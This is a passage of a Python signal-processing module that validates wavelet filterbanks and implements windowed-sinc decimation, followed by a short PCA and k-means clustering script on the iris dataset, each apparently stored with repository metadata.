lp_sum[N//2:])\n if with_phi:\n data['lp'] = lp_sum\n else:\n data['lp_no_phi'] = lp_sum\n if not with_phi and is_analytic:\n lp_sum = lp_sum[1:] # exclude dc\n\n # excess / underflow\n diff_over = lp_sum - th_lp_sum_over\n diff_under = th_lp_sum_under - lp_sum\n diff_over_max, diff_under_max = diff_over.max(), diff_under.max()\n excess_over = np.where(diff_over > th_sum_excess)[0]\n excess_under = np.where(diff_under > th_sum_excess)[0]\n if not is_analytic:\n excess_over += N//2\n excess_under += N//2\n elif is_analytic and not with_phi:\n excess_over += 1\n excess_under += 1 # dc\n\n # lp sum sum\n lp_sum_sum = lp_sum.sum()\n # `1` per bin, minus\n # - DC bin, since no phi\n # - half of Nyquist bin, since `analytic=True` cannot ever get a full\n # Nyquist (Nyquist bin is halved, so even in best case of the peak\n # placed at Nyquist, we get 0.5). Unclear if any correction is due\n # on this.\n # negligible adjustments if `N` is large (JTFS N_frs can be small enough)\n expected_sum = N\n if not with_phi:\n expected_sum -= 1\n if strict_analyticity:\n expected_sum -= .5\n\n # scale according to tolerance.\n # tolerances determined empirically from the most conservative case;\n # see `tests.test_jtfs.test_lp_sum`\n th_sum_above = .01\n th_sum_below = .15\n expected_above = expected_sum * (1 + th_sum_above)\n expected_below = expected_sum * (1 - th_sum_below)\n\n # append report entries ##############################################\n input_kind = \"real\" if for_real_inputs else \"complex\"\n if len(excess_over) > 0:\n # show at most 30 values\n stride = max(int(round(len(excess_over) / 30)), 1)\n s = f\", shown skipping every {stride-1} values\" if stride != 1 else \"\"\n report += [(\"LP sum exceeds threshold of {} (for {} inputs) by \"\n \"at most {:.3f} (more is worse) at following frequency \"\n \"bin indices (0 to {}{}):\\n\"\n ).format(th_lp_sum_over, input_kind, diff_over_max,\n N//2, s)]\n report += [\"{}\\n\\n\".format(w[excess_over][::stride])]\n did_header = did_atleast_one_header = True\n if with_phi:\n data['lp_excess_over'] = excess_over\n data['lp_excess_over_max'] = diff_over_max\n else:\n data['lp_no_phi_excess_over'] = excess_over\n data['lp_no_phi_excess_over_max'] = diff_over_max\n\n if len(excess_under) > 0:\n # show at most 30 values\n stride = max(int(round(len(excess_under) / 30)), 1)\n s = f\", shown skipping every {stride-1} values\" if stride != 1 else \"\"\n report += [(\"LP sum falls below threshold of {} (for {} inputs) by \"\n \"at most {:.3f} (more is worse; ~{} implies ~zero \"\n \"capturing of the frequency!) at following frequency \"\n \"bin indices (0 to {}{}):\\n\"\n ).format(th_lp_sum_under, input_kind, diff_under_max,\n th_lp_sum_under, N//2, s)]\n # w_show = np.round(w[excess_under][::stride], 3)\n report += [\"{}\\n\\n\".format(w[excess_under][::stride])]\n did_header = did_atleast_one_header = True\n if with_phi:\n data['lp_excess_under'] = excess_under\n data['lp_excess_under_max'] = diff_under_max\n else:\n data['lp_no_phi_excess_under'] = excess_under\n data['lp_no_phi_excess_under_max'] = diff_under_max\n\n if lp_sum_sum > expected_above:\n report += [(\"LP sum sum exceeds expected: {} > {}. 
If LP sum \"\n \"otherwise has no excess, then there may be leakage due \"\n \"to imperfect analyticity, corrected by folding; see \"\n \"help(toolkit.fold_lp_sum)\\n\").format(lp_sum_sum,\n expected_above)]\n did_header = did_atleast_one_header = True\n diff = lp_sum_sum - expected_above\n if with_phi:\n data['lp_sum_sum_excess_over'] = diff\n else:\n data['lp_sum_sum_no_phi_excess_over'] = diff\n\n if lp_sum_sum < expected_below:\n report += [(\"LP sum sum falls short of expected: {} < {}. If LP sum \"\n \"otherwise doesn't fall short, then there may be leakage \"\n \"due to imperfect analyticity, corrected by folding; see \"\n \"help(toolkit.fold_lp_sum)\\n\").format(lp_sum_sum,\n expected_below)]\n did_header = did_atleast_one_header = True\n diff = expected_below - lp_sum_sum\n if with_phi:\n data['lp_sum_sum_excess_under'] = diff\n else:\n data['lp_sum_sum_no_phi_excess_under'] = diff\n\n if did_header:\n stdev = np.abs(lp_sum[lp_sum >= th_lp_sum_under] -\n th_lp_sum_under).std()\n report += [(\"Mean absolute deviation from tight frame: {:.2f}\\n\"\n \"Standard deviation from tight frame: {:.2f} \"\n \"(excluded LP sum values below {})\\n\").format(\n np.abs(diff_over).mean(), stdev, th_lp_sum_under)]\n\n pop_if_no_header(report, did_atleast_one_header)\n\n pop_if_no_header(report, did_atleast_one_header)\n th_lp_sum_over = 2 if for_real_inputs else 1\n th_lp_sum_under = th_lp_sum_over / 2\n th_sum_excess = (1 + criterion_amplitude)**2 - 1\n lp_sum_psi = np.sum([np.abs(p)**2 for p in psi_fs], axis=0)\n # fold opposite frequencies to ensure leaks are accounted for\n lp_sum_psi = fold_lp_sum(lp_sum_psi, analytic_part=is_analytic)\n\n # do both cases\n if phi_f is not None:\n report_lp_sum(report, phi=phi_f)\n report_lp_sum(report, phi=0)\n\n # Redundancy #############################################################\n report += [title(\"REDUNDANCY\")]\n did_header = did_atleast_one_header = False\n max_to_print = 20\n\n # overlap ####\n th_r = .4 if for_real_inputs else .2\n\n printed = 0\n for n in range(len(psi_fs) - 1):\n r = compute_filter_redundancy(psi_fs[n], psi_fs[n + 1])\n data['redundancy'][(n, n + 1)] = r\n if r > th_r:\n if not did_header:\n report += [(\"Found filters with redundancy exceeding {} (energy \"\n \"overlap relative to sum of individual energies) \"\n \"-- This isn't necessarily bad. Showing up to {} \"\n \"filters:\\n\").format(th_r, max_to_print)]\n did_header = did_atleast_one_header = True\n if printed < max_to_print:\n report += [\"psi_fs[{}] & psi_fs[{}]: {:.3f}\\n\".format(\n n, n + 1, r)]\n printed += 1\n\n # peak duplication ####\n did_header = False\n\n printed = 0\n for n, peak_idx in enumerate(peak_idxs):\n if np.sum(peak_idx == peak_idxs) > 1:\n data['peak_duplicates'][n] = peak_idx\n if not did_header:\n spc = \"\\n\" if did_atleast_one_header else \"\"\n report += [(\"{}Found filters with duplicate peak frequencies! 
\"\n \"Showing up to {} filters:\\n\").format(spc,\n max_to_print)]\n did_header = did_atleast_one_header = True\n if printed < max_to_print:\n report += [\"psi_fs[{}], peak_idx={}\\n\".format(n, peak_idx)]\n printed += 1\n\n # Decay: check if any bandpass is a pure sine ############################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (check for pure sines)\")]\n did_header = did_atleast_one_header = False\n th_ratio_max_to_next_max = (1 / criterion_amplitude)\n\n for n, p in enumerate(psi_fs):\n psort = np.sort(np.abs(p)) # least to greatest\n ratio = psort[-1] / (psort[-2] + eps)\n if ratio > th_ratio_max_to_next_max:\n if not did_header:\n report += [(\"Found filter(s) that are pure sines! Threshold for \"\n \"ratio of Fourier peak to next-highest value is {} \"\n \"- got (more is worse):\\n\"\n ).format(th_ratio_max_to_next_max)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.2e}\\n\".format(n, ratio)]\n data['sine'][n] = ratio\n\n # Decay: frequency #######################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (frequency)\")]\n did_header = did_atleast_one_header = False\n\n # compute bandwidths\n bandwidths = [compute_bandwidth(pf, criterion_amplitude)\n for pf in psi_fs]\n\n excess_bw = N//2 if strict_analyticity else N\n for n, bw in enumerate(bandwidths):\n if bw == excess_bw:\n if not did_header:\n report += [(\"Found filter(s) that never sufficiently decay \"\n \"in frequency:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}], bandwidth={}\\n\".format(n, bw)]\n\n # handle case where a filter first decays and then rises again\n if unimodal:\n def decayed_then_rose(epf):\n criterion_energy = criterion_amplitude**2\n decay_idxs = np.where(epf < criterion_energy)[0]\n if len(decay_idxs) == 0:\n # never decayed\n return False\n\n first_decay_idx = decay_idxs[0]\n bound = len(epf)//2 # exclude opposite half\n rise_idxs = np.where(epf[first_decay_idx + 1:bound + 1] >\n criterion_energy)[0]\n return bool(len(rise_idxs) > 0)\n\n did_header = False\n for n, pf in enumerate(psi_fs):\n # center about n=0 to handle left & right separately\n pf = np.roll(pf, -np.argmax(np.abs(pf)))\n epf = np.abs(pf)**2\n\n dtr_right = decayed_then_rose(epf)\n # frequency-reverse\n epf[1:] = epf[1:][::-1]\n dtr_left = decayed_then_rose(epf)\n\n # both apply regardless of `strict_analyticity`\n # (since one of them should be impossible if it's `True`)\n if dtr_left or dtr_right:\n if not did_header:\n report += [(\"Found filter(s) that decay then rise again in \"\n \"frequency:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]\\n\".format(n)]\n\n # Decay: boundary effects ################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (boundary effects)\")]\n did_header = did_atleast_one_header = False\n th_ratio_max_to_min = (1 / criterion_amplitude)\n\n psis = [np.fft.ifft(p) for p in psi_fs]\n apsis = [np.abs(p) for p in psis]\n for n, ap in enumerate(apsis):\n ratio = ap.max() / (ap.min() + eps)\n if ratio < th_ratio_max_to_min:\n if not did_header:\n report += [(\"Found filter(s) with incomplete decay (will incur \"\n \"boundary effects), with following ratios of \"\n \"amplitude max to edge (less is worse; threshold \"\n \"is {}):\\n\").format(1 / criterion_amplitude)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: 
{:.1f}\\n\".format(n, ratio)]\n data['decay'][n] = ratio\n\n # check lowpass\n if phi_f is not None:\n aphi = np.abs(np.fft.ifft(phi_f))\n ratio = aphi.max() / (aphi.min() + eps)\n if ratio < th_ratio_max_to_min:\n nl = \"\\n\" if did_header else \"\"\n report += [(\"{}Lowpass filter has incomplete decay (will incur \"\n \"boundary effects), with following ratio of amplitude \"\n \"max to edge: {:.1f} > {}\\n\").format(nl, ratio,\n th_ratio_max_to_min)]\n did_header = did_atleast_one_header = True\n data['decay'][-1] = ratio\n\n # Phase ##################################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"PHASE\")]\n did_header = did_atleast_one_header = False\n th_imag_mean = eps\n\n for n, p in enumerate(psi_fs):\n imag_mean = np.abs(p.imag).mean()\n if imag_mean > th_imag_mean:\n if not did_header:\n report += [(\"Found filters with non-zero phase, with following \"\n \"absolute mean imaginary values:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.1e}\\n\".format(n, imag_mean)]\n data['imag_mean'][n] = imag_mean\n\n # Aliasing ###############################################################\n def diff_extend(diff, th, cond='gt', order=1):\n # the idea is to take `diff` without losing samples, if the goal is\n # `where(diff == 0)`; `diff` is forward difference, and two samples\n # participated in producing the zero, where later one's index is dropped\n # E.g. detecting duplicate peak indices:\n # [0, 1, 3, 3, 5] -> diff gives [2], so take [2, 3]\n # but instead of adding an index, replace next sample with zero such that\n # its `where == 0` produces that index\n if order > 1:\n diff_e = diff_extend(diff, th)\n for o in range(order - 1):\n diff_e = diff_e(diff_e, th)\n return diff_e\n\n diff_e = []\n d_extend = 2*th if cond == 'gt' else th\n prev_true = False\n for d in diff:\n if prev_true:\n diff_e.append(d_extend)\n prev_true = False\n else:\n diff_e.append(d)\n if (cond == 'gt' and np.abs(d) > th or\n cond == 'eq' and np.abs(d) == th):\n prev_true = True\n if prev_true:\n # last sample was zero; extend\n diff_e.append(d_extend)\n return np.array(diff_e)\n\n if unimodal:\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"ALIASING\")]\n did_header = did_atleast_one_header = False\n eps_big = eps * 100 # ease threshold for \"zero\"\n\n if len(peak_idxs) < 6:\n warnings.warn(\"Alias detector requires at least 6 wavelets to \"\n \"work properly, per repeated `np.diff`\")\n\n # check whether peak locations follow a linear or exponential\n # distribution, progressively dropping those that do to see if any remain\n\n # x[n] = A^n + C; x[n] - x[n - 1] = A^n - A^(n-1) = A^n*(1 - A) = A^n*C\n # log(A^n*C) = K + n; diff(diff(K + n)) == 0\n # `abs` for anti-analytic case with descending idxs\n logdiffs = np.diff(np.log(np.abs(np.diff(peak_idxs))), 2)\n # In general it's impossible to determine whether a rounded sequence\n # samples an exponential, since if the exponential rate (A in A^n) is\n # sufficiently small, its rounded values will be linear over some portion.\n # However, it cannot be anything else, and we are okay with linear\n # (unless constant, i.e. duplicate, captured elsewhere) - thus the net\n # case of `exp + lin` is still captured. 
The only uncertainty is in\n # the threshold; assuming deviation by at most 1 sample, we set it to 1.\n # A test is:\n # `for b in linspace(1.2, 6.5, 500): x = round(b**arange(10) + 50)`\n # with `if any(abs(diff, o).min() == 0 for o in (1, 2, 3)): continue`,\n # Another with: `linspace(.2, 1, 500)` and `round(256*b**arange(10) + 50)`\n # to exclude `x` with repeated or linear values\n # However, while this has no false positives (never misses an exp/lin),\n # it can also count some non-exp/lin as exp/lin, but this is rare.\n # To be safe, per above test, we use the empirical value of 0.9\n logdiffs_extended = diff_extend(logdiffs, .9)\n if len(logdiffs_extended) > len(logdiffs) + 2:\n # this could be `assert` but not worth erroring over this\n warnings.warn(\"`len(logdiffs_extended) > len(logdiffs) + 2`; will \"\n \"use more conservative estimate on peaks distribution\")\n logdiffs_extended = logdiffs\n keep = np.where(np.abs(logdiffs_extended) > .9)\n # note due to three `diff`s we artificially exclude 3 samples\n peak_idxs_remainder = peak_idxs[keep]\n\n # now constant (diff_order==1) and linear (diff_order==2)\n for diff_order in (1, 2):\n idxs_diff2 = np.diff(peak_idxs_remainder, diff_order)\n keep = np.where(np.abs(idxs_diff2) > eps_big)\n peak_idxs_remainder = peak_idxs_remainder[keep]\n\n # if anything remains, it's neither\n if len(peak_idxs_remainder) > 0:\n report += [(\"Found Fourier peaks that are spaced neither \"\n \"exponentially nor linearly, suggesting possible \"\n \"aliasing.\\npsi_fs[n], n={}\\n\"\n ).format(peak_idxs_remainder)]\n data['alias_peak_idxs'] = peak_idxs_remainder\n did_header = did_atleast_one_header = True\n\n # Frequency-bandwidth tiling; CQT ########################################\n # note, we checked for linear/exponential spacing in \"Aliasing\" section\n if unimodal:\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"FREQUENCY-BANDWIDTH TILING\")]\n did_header = did_atleast_one_header = False\n\n def isnt_lower_quarter(pidx):\n return ((is_analytic and pidx > N//8) or\n (not is_analytic and pidx < (N - N//8)))\n\n got_peaks_above_first_quarter = any(isnt_lower_quarter(peak_idx)\n for peak_idx in peak_idxs)\n if got_peaks_above_first_quarter:\n # idxs must reflect distance from DC\n if is_analytic:\n peak_idxs_dist = peak_idxs\n else:\n peak_idxs_dist = [N - peak_idx for peak_idx in peak_idxs]\n\n # compute bandwidths, accounting for strict analyticity;\n # can infer full intended bandwidth from just one half\n if strict_analyticity:\n if is_analytic:\n # right is trimmed\n bandwidths = [compute_bandwidth(pf, criterion_amplitude,\n return_sided=True)[0]\n for pf in psi_fs]\n else:\n # left is trimmed\n bandwidths = [compute_bandwidth(pf, criterion_amplitude,\n return_sided=True)[1]\n for pf in psi_fs]\n else:\n bandwidths = [compute_bandwidth(pf, criterion_amplitude)\n for pf in psi_fs]\n\n Qs_upper_quarters = {n: peak_idx_dist / bw\n for n, (peak_idx_dist, bw)\n in enumerate(zip(peak_idxs_dist, bandwidths))\n # must still use original peak idxs here\n if isnt_lower_quarter(peak_idxs[n])}\n\n Qs_values = list(Qs_upper_quarters.values())\n tolerance = .01 # abs relative difference tolerance 1%\n # pick most favorable reference\n Qs_diffs = np.abs(np.diff(Qs_values))\n Q_ref = Qs_values[np.argmin(Qs_diffs) + 1]\n\n non_cqts = []\n for n, Q in Qs_upper_quarters.items():\n if abs(Q - Q_ref) / Q_ref > tolerance:\n non_cqts.append((n, Q))\n\n if len(non_cqts) > 0:\n non_cqt_strs = [\"psi_fs[{}], Q={}\".format(n, Q)\n for n, Q in 
zip(*zip(*non_cqts))]\n report += [(\"Found non-CQT wavelets in upper quarters of \"\n \"frequencies - i.e., `(center freq) / bandwidth` \"\n \"isn't constant: \\n{}\\n\"\n ).format(\"\\n\".join(non_cqt_strs))]\n data['non_cqts'] = non_cqts\n did_header = did_atleast_one_header = True\n\n # Temporal peak ##########################################################\n if unimodal:\n # check that temporal peak is at t==0 ################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"TEMPORAL PEAK\")]\n did_header = did_atleast_one_header = False\n\n for n, ap in enumerate(apsis):\n peak_idx = np.argmax(ap)\n if peak_idx != 0:\n if not did_header:\n report += [(\"Found filters with temporal peak not at t=0!, \"\n \"with following peak locations:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {}\\n\".format(n, peak_idx)]\n data['time_peak_idx'][n] = peak_idx\n\n # check that there is only one temporal peak #########################\n did_header = False\n for n, ap in enumerate(apsis):\n # count number of inflection points (where sign of derivative changes)\n # exclude very small values\n # center for proper `diff`\n ap = np.fft.ifftshift(ap)\n inflections = np.diff(np.sign(np.diff(ap[ap > 10*eps])))\n n_inflections = sum(np.abs(inflections) > eps)\n\n if n_inflections > 1:\n if not did_header:\n report += [(\"\\nFound filters with multiple temporal peaks \"\n \"(or incomplete/non-smooth decay)! \"\n \"(more precisely, >1 inflection points) with \"\n \"following number of inflection points:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {}\\n\".format(n, n_inflections)]\n data['n_inflections'] = n_inflections\n else:\n pop_if_no_header(report, did_atleast_one_header)\n\n # Print report ###########################################################\n report = ''.join(report)\n data['report'] = report\n if verbose:\n if len(report) == 0: # no-cov\n print(\"Perfect filterbank!\")\n else:\n print(report)\n return data\n\n\n# reusables / convenience ####################################################\ndef compute_lp_sum(psi_fs, phi_f=None, J=None, log2_T=None,\n fold_antianalytic=False):\n lp_sum = 0\n for psi_f in psi_fs:\n lp_sum += np.abs(psi_f)**2\n if phi_f is not None and (\n # else lowest frequency bandpasses are too attenuated\n log2_T is not None and J is not None and log2_T >= J):\n lp_sum += np.abs(phi_f)**2\n\n if fold_antianalytic:\n lp_sum = fold_lp_sum(lp_sum, analytic_part=True)\n return lp_sum\n\n\ndef fold_lp_sum(lp_sum, analytic_part=True):\n if analytic_part:\n # reflect anti-analytic part onto analytic;\n # goal is energy conservation - if this is ignored and we\n # normalize analytic part perfectly to 2, the non-zero negative\n # freqs will make the filterbank energy-expansive\n\n # sum onto positives, excluding DC and Nyquist,\n # from negatives, excluding Nyquist\n lp_sum[1:len(lp_sum)//2] += lp_sum[len(lp_sum)//2 + 1:][::-1]\n # zero what we just carried over to not duplicate later by accident\n lp_sum[len(lp_sum)//2 + 1:] = 0\n # with `analytic=True`, this has no effect (all negatives == 0)\n # (note, \"analytic\" in \"analytic_only\" includes pseudo-analytic)\n else:\n # above, but in reverse\n lp_sum[len(lp_sum)//2 + 1:] += lp_sum[1:len(lp_sum)//2][::-1]\n lp_sum[1:len(lp_sum)//2] = 0\n return lp_sum\n\n\n# decimate object ############################################################\nclass Decimate():\n def __init__(self, backend='numpy', dtype=None, 
sign_correction='abs',\n cutoff_mult=1.):\n \"\"\"Windowed-sinc decimation.\n\n Filters are automatically moved to the input's device, each time an\n input's device changes from previous.\n\n Parameters\n ----------\n backend : str['numpy', 'torch', 'jax'] / module\n Name of module, or module object, to use as backend.\n TensorFlow currently not supported.\n\n dtype : str['float32', 'float64'] / None\n Whether to compute and store filters in single or double precision.\n\n sign_correction: str / None\n None: no correction\n\n 'abs': `abs(out)`.\n An explored alternative was `out -= out.min()`, but it's not\n favored per\n - shifting the entire output (dc bias), while the negatives\n don't result from such a shift\n - the negatives are in minority and vary with \"noisy\" factors\n such as boundary effects and signal regularity, making\n the process itself noisy and sensitive to outliers\n \"\"\"\n # input checks\n assert sign_correction in (None, 'abs'), sign_correction\n if not isinstance(dtype, (str, type(None))):\n dtype = str(dtype).split('.')[-1] # e.g. 'torch.float32'\n assert dtype in (None, 'float32', 'float64'), dtype\n\n self.dtype = dtype\n self.sign_correction = sign_correction\n self.cutoff_mult = cutoff_mult\n\n # handle `backend`\n if isinstance(backend, str):\n self.backend_name = backend\n import importlib\n backend = importlib.import_module('wavespin.scattering1d.backend.'\n + self.backend_name + \"_backend\",\n 'backend').backend\n else:\n self.backend_name = backend.__module__.split('.')[-1].rstrip(\n '_backend')\n self.Bk = backend\n\n # complete module of backend\n if self.backend_name == 'torch':\n import torch\n self.B = torch\n elif self.backend_name == 'tensorflow':\n raise NotImplementedError(\"TensorFlow currently isn't supported.\")\n elif self.backend_name == 'jax':\n import jax\n self.B = jax\n if self.dtype == 'float64': # no-cov\n _check_jax_double_precision()\n else:\n self.B = np\n\n # instantiate reusables\n self.filters = {}\n self.unpads = {}\n self.pads = {}\n\n def __call__(self, x, factor, axis=-1, x_is_fourier=False):\n \"\"\"Decimate input (anti-alias filter + subsampling).\n\n Parameters\n ----------\n x : tensor\n n-dim tensor.\n\n factor : int\n Subsampling factor, must be power of 2.\n\n axis : int\n Axis along which to decimate. 
Negative supported.\n\n x_is_fourier : bool (default False)\n Whether `x` is already in frequency domain.\n If possible, it's more performant to pass in `x` in time domain\n as it's passed to time domain anyway before padding (unless it\n won't require padding, which is possible).\n\n Returns\n -------\n o : tensor\n `x` decimated along `axis` axis by `factor` factor.\n \"\"\"\n assert np.log2(factor).is_integer()\n key = (factor, x.shape[axis])\n if key not in self.filters:\n self.make_filter(key)\n return self.decimate(x, key, axis, x_is_fourier)\n\n def decimate(self, x, key, axis=-1, x_is_fourier=False):\n xf, filtf, factor, ind_start, ind_end = self._handle_input(\n x, key, axis, x_is_fourier)\n\n # convolve, subsample, unpad\n of = xf * filtf\n of = self.Bk.subsample_fourier(of, factor, axis=axis)\n o = self.Bk.ifft_r(of, axis=axis)\n o = self.Bk.unpad(o, ind_start, ind_end, axis=axis)\n\n # sign correction\n if self.sign_correction == 'abs':\n o = self.Bk.modulus(o)\n\n return o\n\n def _handle_input(self, x, key, axis, x_is_fourier):\n # from `key` get filter & related info\n factor, N = key\n filtf = self.filters[key]\n ind_start, ind_end = self.unpads[key]\n pad_left, pad_right = self.pads[key]\n\n # pad `x` if necessary; handle domain\n if pad_left != 0 or pad_right != 0:\n if x_is_fourier:\n xf = x\n x = self.Bk.ifft(xf, axis=axis)\n xp = self.Bk.pad(x, pad_left, pad_right, pad_mode='zero', axis=axis)\n xf = self.Bk.fft(xp, axis=axis)\n elif not x_is_fourier:\n xf = self.Bk.fft(x, axis=axis)\n else:\n xf = x\n\n # broadcast filter to input's shape\n broadcast = [None] * x.ndim\n broadcast[axis] = slice(None)\n filtf = filtf[tuple(broadcast)]\n\n # handle device\n if self.backend_name == 'torch':\n if not hasattr(filtf, 'device'):\n filtf = self.B.from_numpy(filtf).to(device=x.device)\n elif filtf.device != x.device:\n filtf = filtf.to(device=x.device)\n elif self.backend_name == 'jax':\n if not hasattr(filtf, 'device') or filtf.device() != x.device():\n filtf = self.B.device_put(filtf, device=x.device())\n\n return xf, filtf, factor, ind_start, ind_end\n\n def make_filter(self, key):\n \"\"\"Create windowed sinc, centered at n=0 and padded to a power of 2,\n and compute pad and unpad parameters.\n\n The filters are keyed by `key = (factor, N)`, where `factor` and `N`\n are stored with successive calls to `Decimate`, yielding dynamic\n creation and storage of filters.\n \"\"\"\n q, N = key\n half_len = 10 * q\n n = int(2 * half_len)\n cutoff = (1. 
/ q) * self.cutoff_mult\n\n        filtf, unpads, pads = self._make_decimate_filter(n + 1, cutoff, q, N)\n        self.filters[key] = filtf\n        self.unpads[key] = unpads\n        self.pads[key] = pads\n\n    # helpers ################################################################\n    def _make_decimate_filter(self, numtaps, cutoff, q, N):\n        h = self._windowed_sinc(numtaps, cutoff)\n\n        # for FFT conv\n        ((pad_left_x, pad_right_x), (pad_left_filt, pad_right_filt)\n         ) = self._compute_pad_amount(N, h)\n        h = np.pad(h, [pad_left_filt, pad_right_filt])\n\n        # time-center filter about 0 (in DFT sense, n=0)\n        h = np.roll(h, -np.argmax(h))\n        # take to fourier\n        hf = np.fft.fft(h)\n        # assert zero phase (imag part ~zero); use the magnitude so sign\n        # cancellation across bins can't hide a nonzero phase\n        assert np.abs(hf.imag).mean() < 1e-15, np.abs(hf.imag).mean()\n        # keep only real part\n        hf = hf.real\n\n        # backend, device, dtype\n        hf = self._handle_backend_dtype(hf)\n\n        # account for additional padding\n        ind_start = int(np.ceil(pad_left_x / q))\n        ind_end = int(np.ceil((N + pad_left_x) / q))\n\n        return hf, (ind_start, ind_end), (pad_left_x, pad_right_x)\n\n    def _compute_pad_amount(self, N, h):\n        # don't concern with whether it decays to zero sooner, assume worst case\n        support = len(h)\n        # since we zero-pad, can halve (else we'd pad by `support` on each side)\n        to_pad = support\n        # pow2 for fast FFT conv\n        padded_pow2 = int(2**np.ceil(np.log2(N + to_pad)))\n\n        # compute padding for input\n        pad_right_x = padded_pow2 - N\n        pad_left_x = 0\n        # compute padding for filter\n        pad_right_filt = padded_pow2 - len(h)\n        pad_left_filt = 0\n\n        return (pad_left_x, pad_right_x), (pad_left_filt, pad_right_filt)\n\n    def _windowed_sinc(self, numtaps, cutoff):\n        \"\"\"Sample & normalize windowed sinc, in time domain\"\"\"\n        win = scipy.signal.get_window(\"hamming\", numtaps, fftbins=False)\n\n        # sample, window, & norm sinc\n        alpha = 0.5 * (numtaps - 1)\n        m = np.arange(0, numtaps) - alpha\n        h = win * cutoff * np.sinc(cutoff * m)\n        h /= h.sum()  # L1 norm\n\n        return h\n\n    def _handle_backend_dtype(self, hf):\n        if self.backend_name == 'numpy':\n            hf = hf.astype(self.dtype)\n\n        elif self.backend_name == 'torch':\n            hf = self.B.from_numpy(hf)\n            dtype = (getattr(self.B, self.dtype)\n                     if isinstance(self.dtype, str) else\n                     self.dtype)\n            hf = hf.to(dtype=dtype)\n\n        elif self.backend_name == 'tensorflow':  # no-cov\n            raise NotImplementedError\n\n        elif self.backend_name == 'jax':\n            hf = self.B.numpy.array(hf, dtype=self.dtype)\n\n        return hf\n\n\ndef _get_ranger(verbose):\n    if verbose:\n        if trange is None:  # no-cov\n            warnings.warn(\"Progress bar requires `tqdm` installed.\")\n            ranger = range\n        else:\n            ranger = trange\n    else:  # no-cov\n        ranger = range\n    return ranger\n","repo_name":"gptanon/dumfail","sub_path":"wavespin/modules/_toolkit/filterbank.py","file_name":"filterbank.py","file_ext":"py","file_size_in_byte":63527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
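# ---------------------------------------------------------------------------
# Editor's example (not part of the source file above): basic use of the
# `Decimate` class defined in that file. It builds and caches one windowed-sinc
# anti-alias filter per (factor, input_length) pair, so repeated calls with the
# same shape reuse the filter; the factor must be a power of 2. The toy signal
# and the re-export path are illustrative assumptions.
import numpy as np
# from wavespin.toolkit import Decimate  # assumed re-export of the class above

t = np.linspace(0, 1, 2048, endpoint=False)
x = np.cos(2 * np.pi * 40 * t)            # toy signal

dec = Decimate(backend='numpy', dtype='float64')
y = dec(x, factor=8)                      # windowed-sinc anti-alias + 8x subsample
assert y.shape[-1] == 2048 // 8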
{"seq_id":"22937348353","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport random as rd\n\n# Load the data\niris = load_iris()\nx = iris.data\n\n# Compress to two dimensions with PCA\ndatas = len(x)\nfactors = len(x[0])\nC = np.zeros((factors,factors))\nfor i in range(datas):\n    tmp = x[i].reshape(factors,1)\n    C += tmp.dot(tmp.T)\n_, e = np.linalg.eigh(C)\nT = e[:, :-3:-1]\ncompressed = x.dot(T)\n\nplt.figure()\ncolors = ['violet','skyblue','yellow']\ncmap = ListedColormap(colors)\nplt.scatter(compressed.T[0],compressed.T[1],c=iris.target,cmap=cmap,alpha=0.5)\nplt.savefig(\"compressed.png\")\n\n# k-means clustering\nc = 3\nmu = np.array([compressed[rd.randrange(datas)] for _ in range(c)])\ny = np.array([rd.randrange(c) for _ in range(datas)])\n\ndef add(x,y,c):\n    ans = np.array([0.0 for _ in range(2)])\n    for i in range(datas):\n        if y[i] == c:\n            ans += x[i]\n    return ans\n\nwhile True:\n    new_y = np.array([np.argmin(np.array([np.linalg.norm(compressed[i]-mu[j],ord=2) for j in range(c)])) for i in range(datas)])\n    nc = np.array([np.count_nonzero(new_y==i) for i in range(c)])\n    new_mu = np.array([1.0/nc[i]*add(compressed,new_y,i) for i in range(c)])\n    if (new_y == y).all() and (new_mu == mu).all():\n        y = new_y\n        mu = new_mu\n        break\n    y = new_y\n    mu = new_mu\n\nplt.figure()\nplt.scatter(compressed.T[0],compressed.T[1],c=y,cmap=cmap,alpha=0.5)\ncolors = ['red','blue','gold']\ncmap = ListedColormap(colors)\nplt.scatter(mu.T[0],mu.T[1],marker='x',c=np.array(range(c)),cmap=cmap)\nplt.savefig(\"clustered.png\")\n","repo_name":"hashi0203/ML-scratch","sub_path":"K-Means-Clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
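# ---------------------------------------------------------------------------
# Editor's example (not part of the dataset record above): the assignment and
# update steps that the k-means script implements with explicit Python loops
# can be written as one vectorized NumPy step. `compressed` and `mu` name the
# same objects as in that script (points of shape (n, 2), centroids (c, 2));
# the sketch assumes no cluster ends up empty.
import numpy as np


def kmeans_step(compressed, mu):
    # squared distance of every point to every centroid: shape (n, c)
    d2 = ((compressed[:, None, :] - mu[None, :, :]) ** 2).sum(axis=2)
    y = d2.argmin(axis=1)                                 # assignment step
    mu_new = np.stack([compressed[y == k].mean(axis=0)    # update step
                       for k in range(mu.shape[0])])
    return y, mu_new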
